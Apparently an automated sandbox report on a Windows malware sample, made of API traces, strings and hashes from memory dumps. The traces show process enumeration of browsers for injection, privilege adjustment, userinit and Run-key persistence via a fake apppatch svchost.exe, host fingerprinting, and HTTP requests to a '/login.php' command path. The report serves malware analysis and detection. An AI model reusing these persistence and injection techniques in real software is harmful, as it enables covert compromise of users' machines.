                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Mutex$HandleOpenSleep$CloseEventExitFileInformationModuleNameProcessRelease
                                                                                                                                                                                                            • String ID: Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}$\explorer.exe
                                                                                                                                                                                                            • API String ID: 2248524772-792691438
                                                                                                                                                                                                            • Opcode ID: f53ae14284c4754efe3b20052a0e5a2e2f2cd9e1a8e46bee7dbb2bd5f79cc01d
                                                                                                                                                                                                            • Instruction ID: bdadd71732932befece7347989e09c4e95afc028ad2e3b1966c15d383ebf5caa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f53ae14284c4754efe3b20052a0e5a2e2f2cd9e1a8e46bee7dbb2bd5f79cc01d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B21C6319807046AD272A769DC49BBAB7ACEF80B91F810B55FB9497180DBF4D8148BA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BC78B4
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 02BC78D9
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000), ref: 02BC78FD
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02BC7917
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC793B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02BC7941
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02BC7948
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC7977
                                                                                                                                                                                                              • Part of subcall function 02BD4880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76F90F00,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4895
                                                                                                                                                                                                              • Part of subcall function 02BD4880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48AC
                                                                                                                                                                                                              • Part of subcall function 02BD4880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48CA
                                                                                                                                                                                                              • Part of subcall function 02BD4880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48E2
                                                                                                                                                                                                              • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(?,00000000), ref: 02BD493B
                                                                                                                                                                                                              • Part of subcall function 02BD4880: FindCloseChangeNotification.KERNEL32(?), ref: 02BD494C
                                                                                                                                                                                                              • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(00000000,?), ref: 02BD495E
                                                                                                                                                                                                              • Part of subcall function 02BD4880: CloseHandle.KERNEL32(00000000), ref: 02BD496F
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 02BC798B
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02BC79A5
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 02BC79B6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 02BC7912
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleInformationProcess$Close$ChangeCriticalFindHeapNotificationOpenProcess32SectionToken$AllocateCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
                                                                                                                                                                                                            • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex
                                                                                                                                                                                                            • API String ID: 280466567-4199822264
                                                                                                                                                                                                            • Opcode ID: aa8d9ff5b15adf2a47f33c833467a93ff52ab8cf0fa7cdf58e88e5a2cb5ccb26
                                                                                                                                                                                                            • Instruction ID: 86ddc1ba09dd5f4d1feefc29551ea670cf9d23cd45951d4c89e6feee8e88382c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa8d9ff5b15adf2a47f33c833467a93ff52ab8cf0fa7cdf58e88e5a2cb5ccb26
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C317E71901215ABE7709F65D808BAEBBBCFF48794F604498EA49D3240DB709A91DFA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 02BB79FC
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 02BB7A0F
                                                                                                                                                                                                              • Part of subcall function 02BD4880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76F90F00,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4895
                                                                                                                                                                                                              • Part of subcall function 02BD4880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48AC
                                                                                                                                                                                                              • Part of subcall function 02BD4880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48CA
                                                                                                                                                                                                              • Part of subcall function 02BD4880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48E2
                                                                                                                                                                                                              • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(?,00000000), ref: 02BD493B
                                                                                                                                                                                                              • Part of subcall function 02BD4880: FindCloseChangeNotification.KERNEL32(?), ref: 02BD494C
                                                                                                                                                                                                              • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(00000000,?), ref: 02BD495E
                                                                                                                                                                                                              • Part of subcall function 02BD4880: CloseHandle.KERNEL32(00000000), ref: 02BD496F
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BB7A1E
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BB7A37
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02BB7A3E
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,69889606a), ref: 02BB7A54
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB7A99
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB7AB3
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 02BB7AC6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Information$HandleOpenProcess$CloseCurrentThreadToken$ChangeCharDesktopFindMutexNotificationObjectQuerySystemUpperUser_snprintflstrcmpimemset
                                                                                                                                                                                                            • String ID: 69889606a$Global\HighMemoryEvent_%08x
                                                                                                                                                                                                            • API String ID: 2411378745-3615184708
                                                                                                                                                                                                            • Opcode ID: 51dce2e0c24740cc8711bb1ed71a26208b3245cc3415ca190950652093c58492
                                                                                                                                                                                                            • Instruction ID: 31d5589392b88263f42f3306ae7d39703818fdcd062410fce8c0d486732bd0df
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51dce2e0c24740cc8711bb1ed71a26208b3245cc3415ca190950652093c58492
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2031C072940215ABDB61CE54DC84FFBB36CEF85B10F540485BE55A7280EBF0AE50DBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                            • AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Token$CurrentOpenProcessThread$AdjustChangeCloseErrorFindLastLookupNotificationPrivilegePrivilegesValue
                                                                                                                                                                                                            • String ID: SeSecurityPrivilege
                                                                                                                                                                                                            • API String ID: 348569255-2333288578
                                                                                                                                                                                                            • Opcode ID: 3675d8f85360a5e42fdf129066f6fc156b204150f992ae2d8091fb389441697d
                                                                                                                                                                                                            • Instruction ID: 2d5ef63a60c9de5ec671934e0939ef4de57ca08cf316f924e5d35224c2b895ed
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3675d8f85360a5e42fdf129066f6fc156b204150f992ae2d8091fb389441697d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16115E71A81204ABEB70DBE09C4DFAE7B7CEB04B45F904848FB01E7180E7B4A614C7A1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 02A01451
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 02A01515
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594045872.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3550616410-0
                                                                                                                                                                                                            • Opcode ID: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                            • Instruction ID: 8c213daab9712e7b5102ab5a373b39487f3b8854f7980512474c738465126cf2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70912AB1D00615AFCB20DFA8D990BEEB7B9AF88354F154559E809B7384EB34AD01CF94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02BC7DFE
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02BC7E27
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BC7E47
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02BC7E64
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC7E6B
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC7E7F
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BC7E99
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02BC7EA1
                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02BC7F40
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7F4F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC7F52
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7F5F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC7F62
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 02BC7F6C
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02BC7F8D
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02BC7FBD
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 02BC7FC7
                                                                                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 02BC7FD1
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC7FD7
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 02BC800D
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BC801C
                                                                                                                                                                                                            • RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02BC8039
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BC8044
                                                                                                                                                                                                            • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02BC8067
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapValue$OpenProcess$ChangeFlushNotifyQuery$AdminAllocCloseCreateEventExistsFileFreeObjectPathSingleUserValidateWaitmemset
                                                                                                                                                                                                            • String ID: ,$C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            • API String ID: 2213373080-1283825033
                                                                                                                                                                                                            • Opcode ID: 692c2a2545630316ff01fe9079b73210f8e7856b0d2e88de19c5b7b8452456d0
                                                                                                                                                                                                            • Instruction ID: bc7823705d18769c5faeb1225f25d90b55e32e5419ac8f3409ebfff5f48eac53
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 692c2a2545630316ff01fe9079b73210f8e7856b0d2e88de19c5b7b8452456d0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2871DC71A40346FBEB308B749C99FBAB76DEF44744F604588FA41EB180DBB19905DBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB66B0
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: memset.MSVCRT ref: 02BC4AED
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02BC4B27
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02BC4B2E
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: memset.MSVCRT ref: 02BC4B3E
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: memcpy.MSVCRT ref: 02BC4B5D
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02BC4BC2
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB670F
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB671F
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB6729
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB6734
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB674F
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB675C
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB6766
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB6771
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB6794
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB67A1
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB67AB
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB67B6
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB67D9
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB67E6
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB67F0
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB67FF
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02BC4BE1
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02BC4C19
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02BC4C4A
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02BC4C5E
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: _snprintf.MSVCRT ref: 02BC4C7C
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02BC4C94
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02BC4CAA
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02BC4CCD
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02BC4D05
                                                                                                                                                                                                            • _strrev.MSVCRT ref: 02BB6869
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001,?), ref: 02BB692C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB692F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB693C
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 02BB693F
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?,00000000,00000001,00000000,/login.php,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 02BB694A
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,?,?), ref: 02BB695B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,?), ref: 02BB6962
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • /login.php, xrefs: 02BB66C1, 02BB66D8
                                                                                                                                                                                                            • 10001, xrefs: 02BB682A
                                                                                                                                                                                                            • 6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 02BB680D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocexit$HeapHttp$Request$File$HeadersProcessmemset$InternetOpen$AllocAttributesConnectCreateDeleteExistsFreeInfoPathQuerySendValidate_snprintf_strrevmemcpy
                                                                                                                                                                                                            • String ID: /login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
                                                                                                                                                                                                            • API String ID: 1958765476-2761129557
                                                                                                                                                                                                            • Opcode ID: e16c27784e8039d242a2f906dfd59a1f2e78f93c8de9f79ff1d6d7ce21671e71
                                                                                                                                                                                                            • Instruction ID: 4a33a5fe97b78c557e9bada39f6e69b6f5c3d1afbcbd5257d7ceb6dc13f95c6c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e16c27784e8039d242a2f906dfd59a1f2e78f93c8de9f79ff1d6d7ce21671e71
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58811470E40315ABEB229F788C45BFA7FA8EF05745F044499FB45AB181D7F1A9448BE0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB3106
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: memset.MSVCRT ref: 02BD5023
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02BD5032
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: RtlAllocateHeap.NTDLL(00000000,?,00000000,00000000), ref: 02BD5039
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: memset.MSVCRT ref: 02BD5051
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02BD5068
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02BD506E
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02BD508F
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD50B6
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD50CA
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: memset.MSVCRT ref: 02BD5124
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02BD5133
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02BD513A
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: memset.MSVCRT ref: 02BD5152
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5169
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02BD516F
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5190
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51B7
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51CB
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,76F92F70,00000000), ref: 02BB3144
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?,?,?,76F92F70,00000000), ref: 02BB3151
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,76F92F70,00000000), ref: 02BB3168
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,76F92F70,00000000), ref: 02BB318E
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,?,?,?,?,76F92F70,00000000), ref: 02BB31AF
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,76F92F70,00000000), ref: 02BB31B9
                                                                                                                                                                                                            • CharUpperA.USER32(00000000,?,?,76F92F70,00000000), ref: 02BB31DF
                                                                                                                                                                                                            • CharUpperA.USER32(00000000,?,?,?,76F92F70,00000000), ref: 02BB31E8
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB3201
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB325F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,76F92F70,00000000), ref: 02BB328E
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 02BB3297
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,02BC6E07,?,?,76F92F70,00000000), ref: 02BB32A3
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 02BB32A6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,76F92F70,00000000), ref: 02BB32B6
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 02BB32B9
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,76F92F70,00000000), ref: 02BB32C5
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 02BB32C8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$memset$Name$CharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$AllocAllocateBackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
